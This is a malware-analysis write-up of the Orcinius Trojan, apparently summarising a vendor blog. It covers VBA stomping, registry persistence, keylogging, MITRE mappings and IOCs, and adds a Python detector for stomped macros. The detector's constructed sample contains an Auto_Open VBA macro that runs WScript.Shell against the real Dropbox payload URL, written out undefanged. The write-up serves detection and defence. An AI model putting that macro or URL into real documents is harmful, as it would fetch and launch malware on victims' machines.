New Orcinius Trojan Employs VBA Stomping to Conceal Infection

Orcinius is a multi-stage Trojan that fetches second-stage payloads from Dropbox and Google Docs while an obfuscated VBA macro keeps the initial stage under the radar; it persists through registry keys and monitors keyboard input and windows. The infection starts with an Excel file, CALENDARIO AZZORTI.xls, whose macro has been VBA-stomped to hide the malicious source, after which the sample modifies the registry, enumerates windows, downloads from encoded URLs, and captures keystrokes to maintain control. #Orcinius #Remcos #AgentTesla #Neshta #HTMLDropper #Synaptics

Keypoints

  • The Orcinius sample is a multi-stage Trojan that uses Dropbox and Google Docs to download second-stage payloads and stay updated.
  • The macro inside the document is obfuscated with a technique called "VBA stomping": the original VBA source text stored in the module is destroyed or replaced while the compiled p-code is kept. Opening the document in the VBA editor then shows an empty module or harmless code, but Office still executes the p-code when its version matches the one the file was compiled with.
  • The initial infection method is an Excel spreadsheet named CALENDARIO AZZORTI.xls.
  • On execution, the malware checks and modifies registry keys to hide warnings and establish persistence (e.g., in startup items).
  • It enumerates the windows of running threads (EnumThreadWindows) and installs a Windows hook (SetWindowsHookEx) to monitor keyboard input and capture keystrokes.
  • It downloads payloads from encoded URLs using WScript.Shell and uses randomized timers to control when it activates and retries downloads; several of the URL references are tied to well-known payload families.

MITRE Techniques

  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The macro in the Excel file carries the malicious functionality; per the article, it is a 'VBA macro that has been modified with a technique called "VBA stomping", where the original source code is destroyed, leaving only compiled p-code.'
  • [T1027] Obfuscated Files and Information – VBA stomping leaves the visible source empty or misleading; the functionality lives in the compiled p-code that Office actually runs.
  • [T1112] Modify Registry – The sample reads registry keys and writes a new key to suppress warnings.
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence is established by writing a key under HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems (an Excel document-recovery list rather than a classic Run key, so hunt for it separately from the usual autostart locations).
  • [T1105] Ingress Tool Transfer – It reaches out to encoded URLs and attempts to download payloads via WScript.Shell.
  • [T1056.001] Keylogging – It uses SetWindowsHookEx to monitor keyboard input.
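VBA stomping (the T1059.005 and T1027 entries above, and the second keypoint) is detectable because it leaves the module stream internally inconsistent: the PerformanceCache (p-code) that Office executes no longer matches the compressed source text that the VBA editor displays. The check below is an added example written for this page, not SonicWall's tooling or code from the sample. It implements the MS-OVBA decompression that tools such as olevba use, then compares the p-code region with the decompressed source. The module streams, the p-code bytes and the split offset are constructed for the example; in a real file the offset comes from the MODULEOFFSET record in the dir stream, and the p-code would be disassembled with something like pcodedmp rather than scanned for printable strings as done here.

```python
import re
import struct


def decompress_vba(container: bytes) -> bytes:
    """MS-OVBA 2.4.1 decompression (the algorithm olevba implements)."""
    if not container or container[0] != 0x01:
        raise ValueError("missing compressed-container signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos < len(container):
        chunk_start = pos
        header = struct.unpack_from("<H", container, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_end = min(len(container), chunk_start + (header & 0x0FFF) + 3)
        compressed = (header >> 15) & 1
        pos = chunk_start + 2
        decomp_chunk_start = len(out)
        if not compressed:                      # raw chunk: 4096 bytes copied as-is
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flag_byte = container[pos]
            pos += 1
            for bit in range(8):                # one flag bit per token, LSB first
                if pos >= chunk_end:
                    break
                if not (flag_byte >> bit) & 1:  # literal token: one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]   # copy token
                pos += 2
                done = len(out) - decomp_chunk_start
                if done == 0:
                    raise ValueError("copy token with nothing to copy from")
                bit_count = max((done - 1).bit_length(), 4)   # ceil(log2(done)), min 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):         # copy may overlap its own output
                    out.append(out[src + i])
    return bytes(out)


def compress_vba_literal(data: bytes) -> bytes:
    """Minimal MS-OVBA encoder using literal tokens only (enough to build the sample).

    A real encoder also emits copy tokens and falls back to raw chunks when the
    token stream would not fit the 12-bit chunk size field.
    """
    out = bytearray(b"\x01")
    for i in range(0, len(data), 4096):
        chunk = data[i:i + 4096]
        body = bytearray()
        for j in range(0, len(chunk), 8):
            body.append(0x00)                   # flag byte: next eight tokens are literals
            body += chunk[j:j + 8]
        if len(body) > 4096:
            raise ValueError("sample encoder handles short chunks only")
        header = (len(body) - 1) | (0b011 << 12) | (1 << 15)
        out += struct.pack("<H", header) + body
    return bytes(out)


ATTRIBUTE_LINE = re.compile(rb"^\s*Attribute\s+VB_", re.I)


def strings_in(blob: bytes, min_len: int = 6) -> set:
    """Printable-ASCII runs: a crude stand-in for disassembling p-code literals."""
    return set(re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob))


def check_module(stream: bytes, text_offset: int) -> dict:
    """Compare the p-code region (before MODULEOFFSET) with the source text after it."""
    pcode, source = stream[:text_offset], decompress_vba(stream[text_offset:])
    code_lines = [ln for ln in source.splitlines() if ln.strip() and not ATTRIBUTE_LINE.match(ln)]
    hidden = sorted(s for s in strings_in(pcode) if s not in source)
    return {
        "source_lines": len(code_lines),        # non-attribute lines the editor would show
        "pcode_only_strings": hidden,           # literals that run but are absent from the source
        "stomped": bool(pcode) and (not code_lines or bool(hidden)),
    }


# Constructed sample (not bytes from the real document): one made-up p-code region
# paired first with an intact source and then with an attribute-only stomped source.
SAMPLE_URL = b"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"  # IOC string, never fetched
INTACT_SOURCE = (b'Attribute VB_Name = "Module1"\r\n'
                 b'Sub Auto_Open()\r\n'
                 b'    Set sh = CreateObject("WScript.Shell")\r\n'
                 b'    sh.Run "' + SAMPLE_URL + b'"\r\n'
                 b'End Sub\r\n')
STOMPED_SOURCE = b'Attribute VB_Name = "Module1"\r\n'
FAKE_PCODE = b"\x01\x16\x03\x00WScript.Shell\x00\x04" + SAMPLE_URL + b"\x00\x00"  # layout is invented


def build_module_stream(pcode: bytes, source: bytes):
    """PerformanceCache followed by compressed source; returns (stream, MODULEOFFSET)."""
    return pcode + compress_vba_literal(source), len(pcode)


if __name__ == "__main__":
    for label, src in (("intact", INTACT_SOURCE), ("stomped", STOMPED_SOURCE)):
        stream, off = build_module_stream(FAKE_PCODE, src)
        print(label, check_module(stream, off))
```

The intact stream reports no p-code-only strings and is not flagged; the stomped stream has zero visible code lines while the p-code region still carries the WScript.Shell literal and the download URL, which is exactly the mismatch olevba's stomping detection looks for. On a real document, run the comparison per module with the MODULEOFFSET from the dir stream, and remember that the p-code only runs when the Office version matches, so a mismatch on an analysis VM does not prove the macro was inert on the victim.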

Indicators of Compromise

  • [Hash] SHA-256 – 28dd92363338b539aeec00df283e20666ad1bdee90d78c6376f615a0b9481f97 – Primary IOC provided by SonicWall.
  • [Domain] www-env.dropbox-dns[.]com – Dropbox DNS/hosting domain used by the Dropbox-related infrastructure.
  • [URL] Google Docs download – hxxps://docs.google[.]com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download – Download URL referenced by the sample.
  • [URL] Dropbox payload – hxxps://www.dropbox[.]com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 – Download link associated with the sample.
  • [File] CALENDARIO AZZORTI.xls – Initial infection document carrying the stomped macro.

Read more: https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/